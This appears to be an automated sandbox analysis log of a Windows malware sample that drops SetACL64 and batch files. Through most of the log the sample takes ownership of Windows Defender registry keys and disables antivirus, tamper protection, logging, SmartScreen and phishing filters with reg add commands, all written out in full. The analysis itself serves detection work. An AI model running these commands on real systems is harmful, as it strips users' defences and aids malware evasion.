Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Code function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350F
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C174C28F
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C173E4B0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C17494BC
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1753410
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C17013F0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C172A350
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C172BC40
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1736B2A
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1754218
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C173C250
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C17163E0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C175A31C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1738360
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C174F394
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C175669C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C173A630
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C170F650
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C172E530
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1717580
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1759718
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C175B74C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C175C76C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1701A30
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C174FB00
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1727B10
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C173F9C0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C170E9D0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C174EA10
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C1763C64
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C170CB20
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C174BFE8
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C175DFF0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C174EF30
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C175EF6C
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe | SHA256 5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | SHA256 4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll | SHA256 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: String function: 00007FF7C1709D20 appears 94 times
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: String function: 00007FF7C17094C0 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: String function: 00007FF7C170AC70 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: String function: 00007FF7C1709CB0 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: String function: 00007FF7C1713F80 appears 116 times
Source: Ms63nDrOBa.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: classification engine | Classification label: mal96.phis.evad.winEXE@149/9@0/0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C171BF60 GetLastError,#13,SysStringByteLen,SysAllocStringByteLen,SysFreeString,LoadLibraryExW,LoadLibraryExW,FormatMessageW,LocalFree,FreeLibrary,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Code function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1723A5E AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1723D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1723FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C17142A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Code function: 0_2_004049A4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Code function: 0_2_004021AF CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1714810 FindResourceW,LoadResource,LockResource,FreeResource,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_03
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | File created: C:\Users\user\AppData\Local\Temp\nse5B60.tmp
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat
Source: Ms63nDrOBa.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Ms63nDrOBa.exe | ReversingLabs: Detection: 28%
Source: Ms63nDrOBa.exe | Virustotal: Detection: 33%
Source: SetACL64.exe | String found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exe | String found in binary or memory: -help
Source: SetACL64.exe | String found in binary or memory: Type 'SetACL -help' for help.
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | File read: C:\Users\user\Desktop\Ms63nDrOBa.exe
Source: unknown | Process created: C:\Users\user\Desktop\Ms63nDrOBa.exe "C:\Users\user\Desktop\Ms63nDrOBa.exe"
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
